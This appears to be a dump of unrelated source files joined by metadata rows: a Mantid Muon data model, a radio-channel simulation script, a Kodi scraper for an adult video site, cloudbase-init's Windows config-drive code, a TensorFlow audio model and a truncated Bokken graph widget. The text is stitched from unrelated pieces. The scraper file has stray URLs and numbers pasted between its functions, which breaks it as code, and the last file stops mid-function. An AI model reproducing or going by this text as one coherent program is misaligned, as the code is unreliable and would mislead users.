# SPDX - License - Identifier: GPL - 3.0 +
from __future__ import (absolute_import, division, print_function)
from Muon.GUI.Common.muon_load_data import MuonLoadData
class LoadWidgetModel(object):
"""
The model is responsible for storing the currently loaded run or runs
(both the nun numbers, filenames and workspaces) as well as loading new runs using a separate loading thread.
"""
def __init__(self, loaded_data_store=MuonLoadData(), muon_context=None):
self._loaded_data_store = loaded_data_store
self._context = muon_context
def add_muon_data(self, filename, workspace, run):
self._loaded_data_store.add_data(run=run, filename=filename, workspace=workspace)
def clear_data(self):
self._loaded_data_store.clear()
self._context.current_runs = []
def is_filename_loaded(self, filename):
return self._loaded_data_store.contains(filename=filename)
def is_run_loaded(self, run):
return self._loaded_data_store.contains(run=run)
@property
def workspaces(self):
return self._context.current_workspaces
@property
def runs(self):
return self._context.current_runs
@property
def filenames(self):
return self._context.current_filenames
|
gpl-3.0
| 1,026,091,008,242,188,000
| 32.622222
| 113
| 0.693985
| false
| 3.708333
| false
| false
| false
|
maemre/rasim
|
sim.py
|
1
|
10863
|
#!/usr/bin/env python
# Holy import!
from __future__ import division
from numpy import *
from matplotlib import pyplot as P
from agent import OptHighestSNR, RandomChannel, IndividualQ, FixChannel
from channel.simple import SimpleChannel
from traffic.simple import SimpleTraffic
from environment import Environment
import os
# simulation parameters:
from params import *
from args import argv
# create data-output directory
output_dir = os.path.join(argv.output_dir, prefix)
try:
os.mkdir(argv.output_dir)
except OSError:
pass
try:
os.mkdir(output_dir)
except OSError:
pass
# generate channel-related stuff
# goodness of channels
goodness = concatenate((ones(N_good_channel), zeros(N_channel - N_good_channel)))
random.shuffle(goodness)
# channel generator
def gen_chan(i):
ch = noise['bad']
if goodness[i]:
ch = noise['good']
return SimpleChannel(base_freq + chan_bw * i, **ch)
def init_state(i):
# disk point picking - http://mathworld.wolfram.com/DiskPointPicking.html
r = sqrt(random.rand())*r_init
theta = random.rand()*2*pi
return {
'state': (random.randint(0, N_channel), random.randint(0, B)),
'x': r*cos(theta),
'y':r*sin(theta),
'id': i,
'speed': 0 if i < N_stationary_agent else 30. / 3.6 * t_slot # 30 kph
}
if argv.agents is None:
print 'No agent type is specified. Simulation cannot run. For details run rasim with "--help" option'
exit(1)
agent_types = []
for i in [RandomChannel, IndividualQ, OptHighestSNR]: # + [FixChannel, OptHighestSNR]
if i.__name__ in argv.agents:
agent_types.append(i)
paths = {}
for a in agent_types:
paths[a] = os.path.join(output_dir, a.__name__)
try:
os.mkdir(paths[a])
except OSError:
pass
# init statistics
avg_energies = zeros([len(agent_types), N_agent, t_total])
en_type = zeros([len(agent_types), t_total])
avg_bits = zeros([len(agent_types), N_agent, t_total])
bits_type = zeros([len(agent_types), t_total], dtype=int_)
en_idle = zeros([len(agent_types), N_agent, t_total])
en_sense = zeros([len(agent_types), N_agent, t_total])
en_sw = zeros([len(agent_types), N_agent, t_total])
en_tx = zeros([len(agent_types), N_agent, t_total])
buf_overflow = zeros([len(agent_types), N_agent, t_total], dtype=int_)
buf_levels = zeros([len(agent_types), N_agent, t_total], dtype=int_)
init_positions = zeros([len(agent_types), N_runs, N_agent, 2])
last_positions = zeros([len(agent_types), N_runs, N_agent, 2])
#############
# Arrays below are reused for each agent type and their values are saved per agent ype for
# small memory footprint!!
#############
# Channel traffic record. 0 = no traffic, 1 = PU traffic
channel_traf = zeros([N_channel, N_runs, t_total], dtype=int_)
# Agent transmission record. 0..N_channel-1 = transimt over given channel, N_channel = idle
# a huge matrix indeed
transmissions = zeros([N_runs, N_agent, t_total])
def run_simulation(agent_type, agent_no):
global avg_energies, en_type, avg_bits, bits_type, buf_overflow
# channels themselves
channels = [gen_chan(i) for i in xrange(N_channel)]
# channel traffics
traffics = [SimpleTraffic() for i in xrange(N_channel)]
env = Environment(channels, traffics, pd=0.9, pf=0.1)
if argv.verbose or not batch_run:
print 'Agent type:', agent_type.__name__
for n_run in xrange(N_runs):
# generate agents
agents = [agent_type(env, init_state(i)) for i in xrange(N_agent)]
env.set_agents(agents)
init_positions[agent_no, n_run] = [(a.x, a.y) for a in agents]
energies = zeros([N_agent, t_total])
bits = zeros([N_agent, t_total])
if argv.verbose or not batch_run:
print "Run #%d of %d(agent), %d of %d(total)" % (n_run + 1, N_runs, n_run + agent_no * N_runs + 1, N_runs * len(agent_types))
rates = [0,0,0,0,0]
for t in xrange(t_total):
env.next_slot()
channel_traf[:,n_run,t] = env.t_state
# get actions
actions = [a.act_then_idle() for a in agents]
# collect statistics for buffer overflow and buffer levels
for i, a in enumerate(agents):
buf_overflow[agent_no, i, t] = int(a.buf_overflow)
buf_levels[agent_no, i, t] += B - a.B_empty
# collisions per channel where,
# N_agent: PU collision, (0..N_agent-1): SU collision with ID
# -1: No collision
collisions = [N_agent if traffic else -1 for traffic in env.t_state]
collided = [False] * N_agent
for i, a in enumerate(actions):
if a['action'] == ACTION.TRANSMIT:
if collisions[a['channel']] == N_agent:
# collision with PU, mark agent as collided
collided[i] = True
rates[4] += 1
elif collisions[a['channel']] >= 0:
# collision with SU, mark both agents as collided
collided[i] = collided[collisions[a['channel']]] = True
else:
# no collision *yet*
collisions[a['channel']] = i
transmissions[n_run, i, t] = a['channel']
else:
transmissions[n_run, i, t] = N_channel
# For each agent compute transmission successes and report
# transmission success/failure to agent
for i, a in enumerate(agents):
# collect energy usage statistics
energies[i, t] = a.E_slot
en_type[agent_no, t] += a.E_slot
en_idle[agent_no, i, t] += a.E_idle
en_sense[agent_no, i, t] += a.E_sense
en_tx[agent_no, i, t] += a.E_tx
en_sw[agent_no, i, t] += a.E_sw
act = actions[i]
# send feedback to idle agents too
if act['action'] == ACTION.IDLE:
a.feedback(False, False, idle=True)
# if collision occurred, report collusion
if collided[i]:
a.feedback(collision=True, success=False)
rates[0] += 1
continue
if act['action'] != ACTION.TRANSMIT:
rates[3] += 1
continue
ch = env.channels[act['channel']]
# no collision, check transmission success by channel quality
pkt_sent = ch.transmission_successes(act['power'], act['bitrate'], act['pkt_size'], act['n_pkt'], a.x, a.y)
# give feedback
if pkt_sent == 0:
a.feedback(collision=False, success=False)
else:
a.feedback(collision=False, success=True, N_pkt=pkt_sent)
rates[1] += pkt_sent * 1.0 / act['n_pkt']
rates[2] += act['n_pkt'] - pkt_sent
# collect bit transmission statistics
bits[i, t] = pkt_sent * act['pkt_size']
bits_type[agent_no, t] += pkt_sent * act['pkt_size']
# save energies
#savetxt('energy_%d.txt' % n_run, energies)
# take averages
avg_energies[agent_no] += energies
avg_bits[agent_no] += bits
# print stats
rates[4] = rates[4] / (t_total * N_channel) * 100
if argv.verbose or not batch_run:
print "Collisions: %d\nSuccesses: %f\nLost in Channel: %d\nIdle: %d\n%%PU Collisions: %f" % tuple(rates)
print "%Success:", rates[1]/(t_total*N_agent - rates[3]) * 100
print "%Collided channels:", rates[0]/(t_total*N_channel) * 100
print
last_positions[agent_no, n_run] = [(a.x, a.y) for a in agents]
# save statistics
save(os.path.join(output_dir, agent_type.__name__, 'channel_traf.npy'), channel_traf)
save(os.path.join(output_dir, agent_type.__name__, 'transmissions.npy'), transmissions)
for i, agent_type in enumerate(agent_types):
run_simulation(agent_type, i)
buf_levels /= N_runs
avg_energies /= N_runs
avg_bits /= N_runs
en_idle /= N_runs
en_sense /= N_runs
en_tx /= N_runs
en_sw /= N_runs
# give outputs
if not batch_run:
P.figure()
for i, agent_type in enumerate(agent_types):
P.plot(cumsum(en_type[i])/cumsum(bits_type[i]), label=agent_type.__name__)
P.legend()
P.xlabel('Time (time slots)')
P.ylabel('Energy/bit (cumulative)')
P.title('Efficiency (Cumulative Energy/bit) vs Time')
P.figure()
for i, agent_type in enumerate(agent_types):
P.plot(convolve(buf_overflow[i].sum(axis=0)/(N_agent*1.0), [1./7]*7), label=agent_type.__name__)
P.legend()
P.xlabel('Time (time slots)')
P.ylabel('# of buffer overflows (7-point avg, per agent)')
P.title('Buffer Overflows vs Time')
P.figure()
P.bar(arange(len(agent_types)), buf_overflow.sum(axis=(1,2)))
P.legend()
P.xlabel('Agent Type')
P.ylabel('# of buffer overflows (avg, per agent)')
P.xticks(arange(len(agent_types) + 1), [x.__name__ for x in agent_types] + [''])
P.title('Buffer overflows vs Agent Type')
P.figure()
for i, agent_type in enumerate(agent_types):
P.plot(buf_levels[i].sum(axis=0)/(N_agent*1.0), label=agent_type.__name__)
P.legend()
P.xlabel('Time (time slots)')
P.ylabel('buffer occupancy')
P.title('Buffer Occupancy (avg) vs Time')
P.figure()
for i, agent_type in enumerate(agent_types):
P.plot(cumsum(en_idle[i].sum(axis=0) / N_agent), label=agent_type.__name__)
P.legend()
P.xlabel('Time (time slots)')
P.ylabel('Avg Idle Energy (cumulative)')
P.title('Idle Energy vs Time')
P.show()
print "Throughput:"
for i, agent_type in enumerate(agent_types):
print "\t%s:\t%f" % (agent_type.__name__, sum(bits_type[i]))
# save statistics
# save agent types
with open(os.path.join(output_dir, 'agents.txt'), 'w') as f:
f.write('\n'.join(x.__name__ for x in agent_types))
save(os.path.join(output_dir, 'avg_energies.npy'), avg_energies)
save(os.path.join(output_dir, 'avg_bits.npy'), avg_bits)
save(os.path.join(output_dir, 'en_idle.npy'), en_idle)
save(os.path.join(output_dir, 'en_sense.npy'), en_sense)
save(os.path.join(output_dir, 'en_tx.npy'), en_tx)
save(os.path.join(output_dir, 'en_sw.npy'), en_sw)
save(os.path.join(output_dir, 'en_type.npy'), en_type)
save(os.path.join(output_dir, 'buf_overflow.npy'), buf_overflow)
save(os.path.join(output_dir, 'buf_levels.npy'), buf_overflow)
save(os.path.join(output_dir, 'init_positions.npy'), init_positions)
save(os.path.join(output_dir, 'last_positions.npy'), last_positions)
|
apache-2.0
| 5,194,816,224,260,189,000
| 38.220217
| 137
| 0.58308
| false
| 3.309872
| false
| false
| false
|
alfa-jor/addon
|
plugin.video.alfa/channels/sxyprn.py
|
1
|
6787
|
# -*- coding: utf-8 -*-
#------------------------------------------------------------
import urlparse,re
from platformcode import config, logger
from core import scrapertools
from core.item import Item
from core import servertools
from core import httptools
host = 'https://www.sxyprn.com'
def mainlist(item):
logger.info()
itemlist = []
itemlist.append( Item(channel=item.channel, title="Nuevos" , action="lista", url=host + "/blog/all/0.html?fl=all&sm=latest"))
itemlist.append( Item(channel=item.channel, title="Mas vistos" , action="lista", url=host + "/popular/top-viewed.html"))
itemlist.append( Item(channel=item.channel, title="Mejor valorada" , action="lista", url=host + "/popular/top-rated.html"))
itemlist.append( Item(channel=item.channel, title="Sitios" , action="categorias", url=host))
itemlist.append( Item(channel=item.channel, title="Categorias" , action="categorias", url=host))
itemlist.append( Item(channel=item.channel, title="Buscar", action="search"))
return itemlist
def search(item, texto):
logger.info()
texto = texto.replace(" ", "-")
item.url = host + "/%s.html" % texto
try:
return lista(item)
except:
import sys
for line in sys.exc_info():
logger.error("%s" % line)
return []
def categorias(item):
logger.info()
itemlist = []
data = httptools.downloadpage(item.url).data
data = re.sub(r"\n|\r|\t| |<br>|<br/>", "", data)
if "Sitios" in item.title:
patron = "<a href='([^']+)' target='_blank'><div class='top_sub_el top_sub_el_sc'>.*?"
patron += "<span class='top_sub_el_key_sc'>([^<]+)</span>"
patron += "<span class='top_sub_el_count'>(\d+)</span>"
else:
patron = "<a class='tdn' href='([^']+)'.*?"
patron += "<span class='htag_el_tag'>([^<]+)</span>"
patron += "<span class='htag_el_count'>(\d+) videos</span>"
matches = re.compile(patron,re.DOTALL).findall(data)
for scrapedurl,scrapedtitle,cantidad in matches:
scrapedplot = ""
scrapedthumbnail = ""
scrapedurl = urlparse.urljoin(item.url,scrapedurl)
title = scrapedtitle + " (" + cantidad + ")"
itemlist.append( Item(channel=item.channel, action="lista", title=title, url=scrapedurl,
thumbnail=scrapedthumbnail , plot=scrapedplot) )
return itemlist
def lista(item):
logger.info()
itemlist = []
data = httptools.downloadpage(item.url).data
data = re.sub(r"\n|\r|\t| |<br>|<br/>", "", data)
patron = "<img class=.*?"
patron += " src='([^']+)'.*?"
patron += "<span class='duration_small'.*?'>([^<]+)<.*?"
patron += "<span class='shd_small'.*?>([^<]+)<.*?"
patron += "post_time' href='([^']+)' title='([^']+)'"
matches = re.compile(patron,re.DOTALL).findall(data)
for scrapedthumbnail,scrapedtime,quality,scrapedurl,scrapedtitle in matches:
title = "[COLOR yellow]%s[/COLOR] [COLOR red]%s[/COLOR] %s" % (scrapedtime,quality,scrapedtitle)
thumbnail = "https:" + scrapedthumbnail
scrapedurl = urlparse.urljoin(item.url,scrapedurl)
plot = ""
itemlist.append( Item(channel=item.channel, action="play", title=title, url=scrapedurl,
thumbnail=thumbnail, fanart=thumbnail, plot=plot, contentTitle = scrapedtitle))
#
next_page = scrapertools.find_single_match(data, "<div class='ctrl_el ctrl_sel'>.*?<a href='([^']+)'")
if next_page:
next_page = urlparse.urljoin(item.url,next_page)
itemlist.append( Item(channel=item.channel, action="lista", title="Página Siguiente >>", text_color="blue",
url=next_page) )
return itemlist
130
https://www.sxyprn.com/cdn8/c9/e1y9b3mzc1o101lzg5q2cze1j390h/kK-CN4l73_EeBhkoYNYA2A/1568228307/65xbtac5i3dbd568c4r9z4575at/g5fd37a74djew1zev21dm176g86.vid
data-vnfo='{"5d77de1e2d168":"\/cdn\/c9\/e1y9b3mzc1o101lzg5q2cze1j390h\/kK-CN4l73_EeBhkoYNYA2A\/1568228437\/65xbtac5i3dbd568c4r9z4575at\/g5fd37a74djew1zev21dm176g86.vid
-114
data-vnfo='{"5d77de1e2d168":"\/cdn\/c9\/m1v963ez51m1u11za5u2xz41e3806\/BQFIcJlTMr0-Z1gVUTxgaQ\/1568228604\/je54bwaz5r3xbn5a864k91487sa\/o5sd17r7xdaea1be32xd41b6b8z.vid
https://www.sxyprn.com/cdn8/c9/m1v963ez51m1u11za5u2xz41e3806/BQFIcJlTMr0-Z1gVUTxgaQ/1568228490/je54bwaz5r3xbn5a864k91487sa/o5sd17r7xdaea1be32xd41b6b8z.vid
-137
data-vnfo='{"5d77de1e2d168":"\/cdn\/c9\/5v1n993kzs1n1f1ozc5b20zg1o350\/NCnvDdBfOQmJOivEflNSww\/1568229437\/05pbja75c39br5m8q41974z7haf\/v85edl7b76diej12eb2wd7136v8.vid
https://www.sxyprn.com/cdn8/c9/5v1n993kzs1n1f1ozc5b20zg1o350/NCnvDdBfOQmJOivEflNSww/1568229300/05pbja75c39br5m8q41974z7haf/v85edl7b76diej12eb2wd7136v8.vid
-106
data-vnfo='{"5d77de1e2d168":"\/cdn\/c9\/41v9b3nzc1q1615zr5n2szw153905\/9LeO2lux-GrgOaEPfMONcA\/1568230473\/1d52b3aa5s36bt5d8o4a9m427pa\/zh5sdc7k7ndee11qe42sdz1h6j8.vid
https://www.sxyprn.com/cdn8/c9/41v9b3nzc1q1615zr5n2szw153905/9LeO2lux-GrgOaEPfMONcA/1568230367/1d52b3aa5s36bt5d8o4a9m427pa/zh5sdc7k7ndee11qe42sdz1h6j8.vid
https://c9.trafficdeposit.com/vidi/m1v963ez51m1u11za5u2xz41e3806/BQFIcJlTMr0-Z1gVUTxgaQ/1568228490/5ba53b584947a/5d77de1e2d168.vid
https://c9.trafficdeposit.com/vidi/e1y9b3mzc1o101lzg5q2cze1j390h/kK-CN4l73_EeBhkoYNYA2A/1568228307/5ba53b584947a/5d77de1e2d168.vid
+ + + + + + + + + + +
193111152130
+ + + + + + + + + + +
https://c9.trafficdeposit.com/vidi/5v1n993kzs1n1f1ozc5b20zg1o350/NCnvDdBfOQmJOivEflNSww/1568229300/5ba53b584947a/5d77de1e2d168.vid
https://c9.trafficdeposit.com/vidi/m1v963ez51m1u11za5u2xz41e3806/NCnvDdBfOQmJOivEflNSww/1568229300/5ba53b584947a/5d77de1e2d168.vid
def play(item):
itemlist = []
data = httptools.downloadpage(item.url).data
data = re.sub(r"\n|\r|\t|amp;|\s{2}| ", "", data)
url = scrapertools.find_single_match(data, 'data-vnfo=.*?":"([^"]+)"')
url = url.replace("\/", "/").replace("/cdn/", "/cdn8/")
url = urlparse.urljoin(item.url,url)
itemlist = servertools.find_video_items(item.clone(url = url, contentTitle = item.title))
# itemlist.append( Item(channel=item.channel, action="play",server=directo, title = item.title, url=url))
return itemlist
|
gpl-3.0
| 4,249,873,821,578,241,500
| 55.082645
| 167
| 0.620395
| false
| 2.770927
| false
| false
| false
|
cmin764/cloudbase-init
|
cloudbaseinit/metadata/services/osconfigdrive/windows.py
|
1
|
8485
|
# Copyright 2012 Cloudbase Solutions Srl
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import itertools
import os
import shutil
import struct
import tempfile
import uuid
from oslo_config import cfg
from oslo_log import log as oslo_logging
from cloudbaseinit import exception
from cloudbaseinit.metadata.services.osconfigdrive import base
from cloudbaseinit.osutils import factory as osutils_factory
from cloudbaseinit.utils.windows import disk
from cloudbaseinit.utils.windows import vfat
opts = [
cfg.StrOpt('bsdtar_path', default='bsdtar.exe',
help='Path to "bsdtar", used to extract ISO ConfigDrive '
'files'),
]
CONF = cfg.CONF
CONF.register_opts(opts)
LOG = oslo_logging.getLogger(__name__)
CONFIG_DRIVE_LABEL = 'config-2'
MAX_SECTOR_SIZE = 4096
# Absolute offset values and the ISO magic string.
OFFSET_BOOT_RECORD = 0x8000
OFFSET_ISO_ID = OFFSET_BOOT_RECORD + 1
ISO_ID = b'CD001'
# Little-endian unsigned short size values.
OFFSET_VOLUME_SIZE = OFFSET_BOOT_RECORD + 80
OFFSET_BLOCK_SIZE = OFFSET_BOOT_RECORD + 128
PEEK_SIZE = 2
class WindowsConfigDriveManager(base.BaseConfigDriveManager):
def __init__(self):
super(WindowsConfigDriveManager, self).__init__()
self._osutils = osutils_factory.get_os_utils()
def _check_for_config_drive(self, drive):
label = self._osutils.get_volume_label(drive)
if label and label.lower() == CONFIG_DRIVE_LABEL and \
os.path.exists(os.path.join(drive,
'openstack\\latest\\'
'meta_data.json')):
LOG.info('Config Drive found on %s', drive)
return True
return False
def _get_iso_file_size(self, device):
if not device.fixed:
return None
if not device.size > (OFFSET_BLOCK_SIZE + PEEK_SIZE):
return None
off = device.seek(OFFSET_ISO_ID)
magic = device.read(len(ISO_ID), skip=OFFSET_ISO_ID - off)
if ISO_ID != magic:
return None
off = device.seek(OFFSET_VOLUME_SIZE)
volume_size_bytes = device.read(PEEK_SIZE,
skip=OFFSET_VOLUME_SIZE - off)
off = device.seek(OFFSET_BLOCK_SIZE)
block_size_bytes = device.read(PEEK_SIZE,
skip=OFFSET_BLOCK_SIZE - off)
volume_size = struct.unpack("<H", volume_size_bytes)[0]
block_size = struct.unpack("<H", block_size_bytes)[0]
return volume_size * block_size
def _write_iso_file(self, device, iso_file_path, iso_file_size):
with open(iso_file_path, 'wb') as stream:
offset = 0
# Read multiples of the sector size bytes
# until the entire ISO content is written.
while offset < iso_file_size:
real_offset = device.seek(offset)
bytes_to_read = min(MAX_SECTOR_SIZE, iso_file_size - offset)
data = device.read(bytes_to_read, skip=offset - real_offset)
stream.write(data)
offset += bytes_to_read
def _extract_files_from_iso(self, iso_file_path):
args = [CONF.bsdtar_path, '-xf', iso_file_path,
'-C', self.target_path]
(out, err, exit_code) = self._osutils.execute_process(args, False)
if exit_code:
raise exception.CloudbaseInitException(
'Failed to execute "bsdtar" from path "%(bsdtar_path)s" with '
'exit code: %(exit_code)s\n%(out)s\n%(err)s' % {
'bsdtar_path': CONF.bsdtar_path,
'exit_code': exit_code,
'out': out, 'err': err})
def _extract_iso_from_devices(self, devices):
"""Search across multiple devices for a raw ISO."""
extracted = False
iso_file_path = os.path.join(tempfile.gettempdir(),
str(uuid.uuid4()) + '.iso')
for device in devices:
try:
with device:
iso_file_size = self._get_iso_file_size(device)
if iso_file_size:
LOG.info('ISO9660 disk found on %s', device)
self._write_iso_file(device, iso_file_path,
iso_file_size)
self._extract_files_from_iso(iso_file_path)
extracted = True
break
except Exception as exc:
LOG.warning('ISO extraction failed on %(device)s with '
'%(error)r', {"device": device, "error": exc})
if os.path.isfile(iso_file_path):
os.remove(iso_file_path)
return extracted
def _get_config_drive_from_cdrom_drive(self):
for drive_letter in self._osutils.get_cdrom_drives():
if self._check_for_config_drive(drive_letter):
os.rmdir(self.target_path)
shutil.copytree(drive_letter, self.target_path)
return True
return False
def _get_config_drive_from_raw_hdd(self):
disks = map(disk.Disk, self._osutils.get_physical_disks())
return self._extract_iso_from_devices(disks)
def _get_config_drive_from_vfat(self):
for drive_path in self._osutils.get_physical_disks():
if vfat.is_vfat_drive(self._osutils, drive_path):
LOG.info('Config Drive found on disk %r', drive_path)
vfat.copy_from_vfat_drive(self._osutils, drive_path,
self.target_path)
return True
return False
def _get_config_drive_from_partition(self):
for disk_path in self._osutils.get_physical_disks():
physical_drive = disk.Disk(disk_path)
with physical_drive:
partitions = physical_drive.partitions()
extracted = self._extract_iso_from_devices(partitions)
if extracted:
return True
return False
def _get_config_drive_from_volume(self):
"""Look through all the volumes for config drive."""
volumes = self._osutils.get_volumes()
for volume in volumes:
if self._check_for_config_drive(volume):
os.rmdir(self.target_path)
shutil.copytree(volume, self.target_path)
return True
return False
def _get_config_drive_files(self, cd_type, cd_location):
get_config_drive = self.config_drive_type_location.get(
"{}_{}".format(cd_location, cd_type))
if get_config_drive:
return get_config_drive()
else:
LOG.debug("Irrelevant type %(type)s in %(location)s location; "
"skip",
{"type": cd_type, "location": cd_location})
return False
def get_config_drive_files(self, searched_types=None,
searched_locations=None):
searched_types = searched_types or []
searched_locations = searched_locations or []
for cd_type, cd_location in itertools.product(searched_types,
searched_locations):
LOG.debug('Looking for Config Drive %(type)s in %(location)s',
{"type": cd_type, "location": cd_location})
if self._get_config_drive_files(cd_type, cd_location):
return True
return False
@property
def config_drive_type_location(self):
return {
"cdrom_iso": self._get_config_drive_from_cdrom_drive,
"hdd_iso": self._get_config_drive_from_raw_hdd,
"hdd_vfat": self._get_config_drive_from_vfat,
"partition_iso": self._get_config_drive_from_partition,
"partition_vfat": self._get_config_drive_from_volume,
}
|
apache-2.0
| -5,127,092,252,806,962,000
| 37.568182
| 78
| 0.576429
| false
| 3.941013
| true
| false
| false
|
WhatDo/FlowFairy
|
examples/sine_fix/gglu_nopool.py
|
1
|
3674
|
import tensorflow as tf
import tensorflow.contrib.slim as slim
from flowfairy.conf import settings
from util import lrelu, conv2d, maxpool2d, embedding, avgpool2d, GLU, causal_GLU
from functools import partial
import ops
discrete_class = settings.DISCRETE_CLASS
batch_size = settings.BATCH_SIZE
samplerate = sr = settings.SAMPLERATE
dropout = settings.DROPOUT
learning_rate = settings.LEARNING_RATE
embedding_size = settings.EMBEDDING_SIZE
num_classes = settings.CLASS_COUNT
def broadcast(l, emb):
sh = l.get_shape().as_list()[1]
emb = emb[:, None, None, :]
emb = tf.tile(emb, (1,sh,1,1))
return tf.concat([l, emb], 3)
# Create model
def conv_net(x, cls, dropout, is_training=False):
xs = tf.expand_dims(x, -1)
xs = tf.expand_dims(xs, -1)
conv1 = causal_GLU(xs, 4, [256, 1], scope='conv1_1', normalizer_fn=slim.batch_norm, normalizer_params={'is_training': is_training, 'decay': 0.9})
conv1 = GLU(conv1, 4, [256, 1], scope='conv1_2')
#pool1 = slim.max_pool2d(conv1, [2,1])
print('conv1: ', conv1)
#with tf.name_scope('embedding'):
with tf.variable_scope('embedding'):
emb1 = embedding(cls, embedding_size, num_classes)
embedded = broadcast(conv1, emb1)
print('embedded:', embedded)
#convblock 2
conv2 = GLU(embedded, 8, [256, 1], scope='conv2_1')
conv2 = GLU(conv2, 8, [256, 1], scope='conv2_2')
#pool2 = slim.max_pool2d(conv2, [2,1])
print('conv2: ', conv2)
#convblock 3
conv3 = GLU(conv2, 16, [256, 1], scope='conv3_1')
conv3 = GLU(conv3, 16, [256, 1], scope='conv3_2')
print('conv3: ', conv3)
#convblock 4
#conv4 = tf.depth_to_space(conv3, 4) #upconv
#print('d2sp: ', conv4)
#conv4 = tf.reshape(conv4, shape=[-1, sr, 1, 4]) # reshape upconvolution to have proper shape
conv4 = GLU(conv3, 16, [256, 1], scope='conv4_1')
conv4 = GLU(conv4, 16, [256, 1], scope='conv4_2')
print('conv4: ', conv4)
#convblock 5
conv5 = tf.concat([conv4, conv1], 3) # <- unet like concat first with last
conv5 = GLU(conv5, 16, [256, 1], scope='conv5')
conv5 = GLU(conv5, discrete_class, [2,1], scope='out')
print('conv5: ', conv5)
#out
out = tf.reshape(conv5, [-1, sr, discrete_class])
print('out: ', out)
return out
class Net:
def __init__(self):
pass
def feedforward(self, x, y, frqid, frqid2, is_training=False):
pred = conv_net(x, frqid, None, is_training)
target_output = tf.reshape(y,[-1])
prediction = tf.reshape(pred,[-1, discrete_class])
# Define loss and optimizer
cost = tf.losses.sparse_softmax_cross_entropy(logits = prediction,
labels = target_output,
scope='xentropy')
correct_pred = tf.equal(tf.argmax(pred, 2), y)
with tf.name_scope('accuracy'):
accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))
return pred, cost, accuracy
def train(self, **kwargs):
self.train_x = kwargs['x']
self.train_y = kwargs['y']
self.train_pred, self.train_cost, self.train_acc = self.feedforward(is_training=True, **kwargs)
self.optimizer = ops.train()
def validation(self, **kwargs):
self.val_x = kwargs['x']
self.val_y = kwargs['y']
self.val_pred, self.val_cost, self.val_acc = self.feedforward(**kwargs)
self.val_pred = tf.Print(self.val_pred, [kwargs['frqid'], kwargs['frqid2']], message='frqids: ')
def begin(self, session):
#session.run(self.init)
pass
def should_stop(self):
return False
|
mit
| 6,973,295,967,363,852,000
| 31.803571
| 149
| 0.605335
| false
| 3.06934
| false
| false
| false
|
inguma/bokken
|
ui/graph.py
|
1
|
6901
|
# graph.py
#
# Copyright 2011 Hugo Teso <hugo.teso@gmail.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
from gi.repository import Gtk
from gi.repository import GObject
from PIL import Image
import os, tempfile
from subprocess import *
import ui.mydot_widget as mydot_widget
import graph_bar
class MyDotWidget(Gtk.HBox):
'''Working'''
def __init__(self, core, main):
self.uicore = core
self.main = main
self.last_fcn = ''
#dotcode = self.uicore.get_callgraph()
#GObject.GObject.__init__(self, False, 1)
# MEOW
GObject.GObject.__init__(self)
self.side_vb = Gtk.VBox(False, 1)
self.side_hb = Gtk.HBox(False, 1)
#self.dot_widget = DotWidget()
self.dot_widget = mydot_widget.MyDotWidget(self.uicore, self.main)
self.create_tree()
self.create_preview()
self.pack_start(self.dot_widget, True, True, 0)
self.bar = graph_bar.GraphBar(self.dot_widget, self, self.uicore)
#self.pack_start(self.bar, False, False, 0)
self.side_hb.pack_start(self.bar, False, False, 1)
if self.uicore.backend == 'radare':
self.pack_start(self.side_vb, False, False, 1)
self.side_hb.pack_start(self.sw, True, True, 1)
self.side_vb.pack_start(self.side_hb, True, True, 1)
self.side_vb.pack_start(self.preview, False, False, 0)
def set_dot(self, dotcode):
dotcode = dotcode.replace('overlap="scale", bgcolor="#475672"', 'overlap="scale", bgcolor="invis"')
dotcode = dotcode.replace('color=azure3, fontcolor=white, fillcolor="#373D49"', 'color=blue, fontcolor="#666666", fillcolor=white')
dotcode = dotcode.replace('fillcolor="#5E82C6"', 'fillcolor="white", color=green')
dotcode = dotcode.replace('color=lightgray, style=filled,', 'color=blue')
dotcode = dotcode.replace('color="lightgray"', 'color="blue"')
dotcode = dotcode.replace('len=1.25, color=azure3', 'len=1.25, color=blue')
dotcode = dotcode.replace('color=lightgray', 'color=lightgray, bgcolor=white')
dotcode = dotcode.replace('color="green"', 'color="green", fontname="Courier", fontsize="8"')
self.dot_widget.set_dotcode(dotcode)
self.generate_thumbnail(dotcode)
if self.uicore.backend == 'radare':
self.nodes = {}
function = ''
for node in self.dot_widget.graph.nodes:
function = ''
if node.url:
function, node_name = node.url.split('/')
self.nodes[node_name] = [node.x, node.y]
if function:
self.update_tree(function)
self.dot_widget.on_zoom_100(None)
# Navigate to first node
if self.uicore.backend == 'radare':
if len(self.nodes) > 1:
node = self.nodes.keys()[0]
self.dot_widget.animate_to(int(self.nodes[node][0]), int(self.nodes[node][1]))
def generate_thumbnail(self, dotcode):
#size = self.tree.allocation.width
size = self.side_hb.get_allocated_width()
tmp_dot = tempfile.NamedTemporaryFile(delete = False)
tmp_dot.write(dotcode)
tmp_dot.close()
cmd = "dot -Tpng " + tmp_dot.name + " > " + tmp_dot.name + ".png"
os.system(cmd)
im = Image.open(tmp_dot.name + ".png")
im.convert('RGBA')
im.thumbnail([size,size], Image.ANTIALIAS)
#im.save(tmp_dot.name + ".png.thumbnail", "JPEG")
# Add white backgound as image is transparent
offset_tuple = (im.size[0], im.size[1])
final_thumb = Image.new(mode='RGBA',size=offset_tuple, color=(255,255,255,0))
final_thumb.paste(im)
final_thumb.save(tmp_dot.name + ".png.thumbnail", "PNG")
self.fill_preview(tmp_dot.name + ".png.thumbnail")
os.remove(tmp_dot.name)
os.remove(tmp_dot.name + ".png")
os.remove(tmp_dot.name + ".png.thumbnail")
def create_preview(self):
# Create Image window for graph preview
self.preview = Gtk.Image()
self.preview.show()
